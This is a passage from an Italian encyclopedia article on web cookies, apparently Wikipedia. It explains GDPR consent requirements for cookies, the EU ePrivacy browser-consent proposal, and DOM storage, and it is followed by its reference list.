Dal 25 maggio 2018 è applicato il regolamento generale sulla protezione dei dati (GDPR, General Data Protection Regulation- Regolamento UE 2016/679) . Il GDPR sostituisce l'attuale legge italiana sulla protezione dei dati (ufficialmente Direttiva 95/46/EC) [21] e abroga le norme del Codice per la protezione dei dati personali (dlgs.n. 196/2003) che risulteranno con esso incompatibili. Pertanto, gli articoli del codice italiano che non siano specificatamente coperti dal GDPR rimangono in vigore (a meno di futuri provvedimenti legislativi).

Secondo la Commissione Europea "i dati personali sono qualunque informazione relativa a un individuo, collegata alla sua vita sia privata, sia professionale o pubblica. Può riguardare qualunque dato personale: nomi, foto, indirizzi email, dettagli bancari, interventi su siti web di social network, informazioni mediche o indirizzi IP di computer." [22]

Per questo anche i cookie devono essere trattati come dati personali e devono essere gestiti come segue:

  • I dati personali non possono essere tracciati o usati prima che l'utente abbia dato il consenso esplicito;
  • Devono essere specificati tutti i tracciamenti dei dati personali su tutte le pagine/URLs del sito coinvolte;
  • Gli utenti del sito devono essere informati in un linguaggio semplice su:
    • Chi riceve i loro dati e come sono usati;
    • La data di scadenza dei cookie;
  • Ogni autorizzazione deve essere salvata/registrata per provare alle autorità che è stata concessa ( Formato della prova );
  • La revoca del consenso deve essere facile da fare, anche in un secondo momento. [23] [24]

Inoltre la cookie policy deve contenere la lista di tutti i cookie presenti su tutte le pagine del sito e per ognuno di essi: chi riceve i dati, per cosa sono utilizzati e la data di scadenza.

Nel gennaio 2017 la Commissione Europea propose un'alternativa [25] volta a semplificare l'esperienza online, auspicando che siano gli stessi browser a poter gestire le preferenze degli utenti per il consenso/rifiuto dei cookie – eliminando quindi la necessità di gestire le singole accettazione dei cookie nei singoli siti. Questa proposta non ha avuto seguiti ed è stata molto criticata e giudicata non fattibile. [26] [27]

Tecnicamente i browser non riescono a leggere lo scopo di un cookie (come viene utilizzato) e non possono fornire una sua descrizione in un “linguaggio semplice” così come è richiesto nel GDPR. Inoltre i browser non possono registrare tutti i cookie presenti in un intero sito, ma solo uno per volta per pagina singola. I browser non possono gestire consensi differenti in base ai diversi siti (per cui sarebbe un'accettazione di tutti i cookie o di nessuno) e non possono inoltre fornire il Formato della prova (il salvataggio dei consensi) così come richiesto dal GDPR. Alla luce di nessun nuovo sviluppo di questa proposta da parte della Commissione Europea , i gestori dei siti web dovranno attenersi a quanto richiesto dal GDPR.

Cosa cambia rispetto alla legislazione attuale

Nel caso di un sito con la presenza di soli cookie tecnici/funzionali (shopping cart, selezione lingua, preferenze) e/o di cookie di statistica di prima parte (es. Matomo e simili): rimane tutto come è ora e quindi non è necessario avere un cookie banner, il blocco preventivo dei cookie prima del consenso e il salvataggio dei consensi ( formato della prova) .

In questo caso rientrano anche i cookie di statistica di terza parte come Google Analytics con IP anonimizzato in modo tale che non possa essere ricostruito l'indirizzo IP con tecniche di “reverse engineering”. Utilizzando Google Analytics bisogna quindi disattivare la condivisione dei dati con gli altri prodotti/servizi Google [28] , altrimenti si rientra nel caso successivo.

Nel caso di presenza di altri tipi di cookie, e quindi quelli pubblicitari (Google Adsense, DoubleClick, retargeting, ecc) e tutti gli altri di terze parti (Social Network, YouTube, ecc) oltre al cookie banner il GDPR richiede:

  • il consenso esplicito ( opt-in ) e quindi non più implicito come ad esempio "scrollare" la pagina;
  • il blocco preventivo dei cookie prima del consenso;
  • la registrazione dei log del consenso da fornire come “prova”;
  • la descrizione per ogni cookie che comprende chi riceve i dati, per quale scopo e la data di scadenza;
  • la possibilità di revocare il consenso in modo semplice anche in un secondo momento.

Tecnologie analoghe

  • Nel mondo del web storage esiste anche il DOM storage [29] [30] che è una tipologia di contenuti evoluti che ha funzioni simili ai cookie. In pratica, è un cookie articolato e complesso. Ogni sistema operativo, mediante il browser, archivia le informazioni memorizzate dai siti web visitati che alimentano il DOM storage (detto anche Web Storage ) [31] che può essere disabilitato e/o cancellato esattamente come i cookie. Oltre ai cookie i browser hanno un'opzione per abilitare o disabilitare l'archiviazione del dom storage dei siti web che lo richiedono [32] .

Note

  1. ^ Cookie generalmente significa "biscottino" in inglese, in particolare è un biscotto al burro con gocce di cioccolato tipico della cultura statunitense, ma il termine viene usato in questo caso per riferirsi ai biscottini per animali domestici, e più in generale col significato di "piccolo premio".
  2. ^ ( EN ) Tim Jackson, This bug in your PC is a smart cookie , in Financial Times , 12 Feb 1996 - #12 (archiviato dall'originale ) .
  3. ^ Gmail cookie stolen via Google Spreadsheets , su CNET . URL consultato il 12 maggio 2016 .
  4. ^ What about the "EU Cookie Directive" , su Web Cookies Scanner . URL consultato il 12 maggio 2016 .
  5. ^ New net rules set to make cookies crumble , su BBC News . URL consultato il 12 maggio 2016 .
  6. ^ ( EN ) Cookies and privacy , su europarl.europa.eu . URL consultato il 28 maggio 2016 .
  7. ^ ( EN ) Sessions and security , su php.net . URL consultato il 28 maggio 2016 (archiviato dall' url originale il 29 gennaio 2016) .
  8. ^ http://www.youronlinechoices.com/it/a-proposito
  9. ^ 'SameSite' cookie attribute - Chrome Platform Status , su www.chromestatus.com . URL consultato il 7 maggio 2016 .
  10. ^ Learn more about the Public Suffix List , su publicsuffix.org . URL consultato il 24 maggio 2016 .
  11. ^ Sul web si trovano facilmente pagine che indicano i percorsi di archiviazione dei cookie per ogni caso.
  12. ^ http://www.normattiva.it/atto/caricaArticolo?art.progressivo=0&art.idArticolo=122&art.versione=2&art.codiceRedazionale=003G0218&art.dataPubblicazioneGazzetta=2003-07-29&atto.tipoProvvedimento=DECRETO%20LEGISLATIVO&art.idGruppo=36&art.idSottoArticolo1=10&art.idSottoArticolo=1&art.flagTipoArticolo=0#art
  13. ^ Direttiva 2009-136-CE - Garante Privacy , su www.garanteprivacy.it . URL consultato il 10 gennaio 2016 .
  14. ^ Cookies a prova di privacy: le modifiche introdotte dal D.Lgs. 69/12 (1ª Parte) | CINDI
  15. ^ Individuazione delle modalità semplificate per l'informativa e... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 10 gennaio 2016) .
  16. ^ Internet: Garante privacy, no ai cookie per profilazione senza consenso - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 10 gennaio 2016) .
  17. ^ Codice in materia di protezione dei dati personali [Testo consolidato... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall'url originale il 13 gennaio 2016) .
  18. ^ Le nuove regole in materia di Cookie , su ict4executive.it . URL consultato il 26 maggio 2015 (archiviato dall' url originale il 26 maggio 2015) .
  19. ^ Chiarimenti in merito all'attuazione della normativa in materia di cookie - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale l'8 gennaio 2016) .
  20. ^ Codice in materia di protezione dei dati personali [Testo consolidato... - Garante Privacy , su garanteprivacy.it . URL consultato il 10 gennaio 2016 (archiviato dall' url originale il 13 gennaio 2016) .
  21. ^ Direttiva 95/46/CE , su eur-lex.europa.eu .
  22. ^ European Commission's press release announcing the proposed comprehensive reform of data protection rules , su europa.eu .
  23. ^ Implicazioni del GDPR sulla gestione dei cookie (in inglese) ( PDF ), su onetrust.com .
  24. ^ Implicazioni del GDPR sulla gestione dei cookie (in inglese) [ collegamento interrotto ] , su ittrust.eu .
  25. ^ Proposta ePrivacy , su ec.europa.eu .
  26. ^ Posizione IAB Europe ( PDF ), su iabeurope.eu . URL consultato il 3 gennaio 2018 (archiviato dall' url originale il 4 gennaio 2018) .
  27. ^ Critica proposta ePrivacy (in inglese) , su adversitement.com . URL consultato il 3 gennaio 2018 (archiviato dall' url originale il 4 gennaio 2018) .
  28. ^ Come disattivare la condivisione dei dati su Google Analyitcs , su iubenda.com .
  29. ^ Document Object Model storage
  30. ^ http://www.matarrelli.com/w3c/cose-il-dom-storage
  31. ^ HTML5 Web Storage.(
  32. ^ https://www.isunshare.com/blog/enable-dom-storage-in-ie-ff-google-chrome-windows-10/

Voci correlate

Altri progetti

Collegamenti esterni